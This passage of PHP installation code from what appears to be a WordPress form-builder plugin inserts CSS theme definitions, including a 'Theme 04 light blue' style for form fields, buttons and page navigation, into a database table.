position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 10px;\r\n	height: 10px;\r\n	background: #DAA157;\r\n	background: -moz-linear-gradient(bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	background: -webkit-linear-gradient(bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	background: -o-linear-gradient(bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	background: -ms-linear-gradient(bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	background: linear-gradient(to bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	box-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\n	border-radius: 7px;\r\n	top: 1px;\r\n	left: 1px;\r\n	border: 1px solid #C0A77E;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #E2B983;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #AA824E;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #AA824E;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #E2B983;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #AA824E;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(14, \'Theme 04 light blue\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #CEE4E4;\r\nmargin-bottom: 10px;\r\ncolor: #CEE4E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\ncolor: #fff;\r\nborder: 1px solid #88A1A6;\r\nbackground: #86A0A7 ;\r\nbackground: -moz-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -webkit-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -o-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -ms-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: linear-gradient(to bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #767676 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\ncolor: #fff !important;\r\nborder: 1px solid #88A1A6;\r\nbackground: #86A0A7 ;\r\nbackground: -moz-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -webkit-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -o-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -ms-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: linear-gradient(to bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #CEE4E4;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/04/02/bg.png) no-repeat;\r\n	text-align: left;\r\n	border-radius: 0px;\r\n	width: 300px;\r\npadding: 5px;\r\n	text-align: center;\r\nfont-size: 16px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus {\r\n	border-color: #678B94;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	border-color: #678B94;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #678B94;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 10px;\r\nheight: 10px;\r\nbackground: #63929E ;\r\nbackground: -moz-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -webkit-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -o-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -ms-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: linear-gradient(to bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\nborder-radius: 7px;\r\ntop: 1px;\r\nleft: 1px;\r\nborder: 1px solid #678B94;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #88B4BD;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #678B94;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #678B94;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #88B4BD;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: 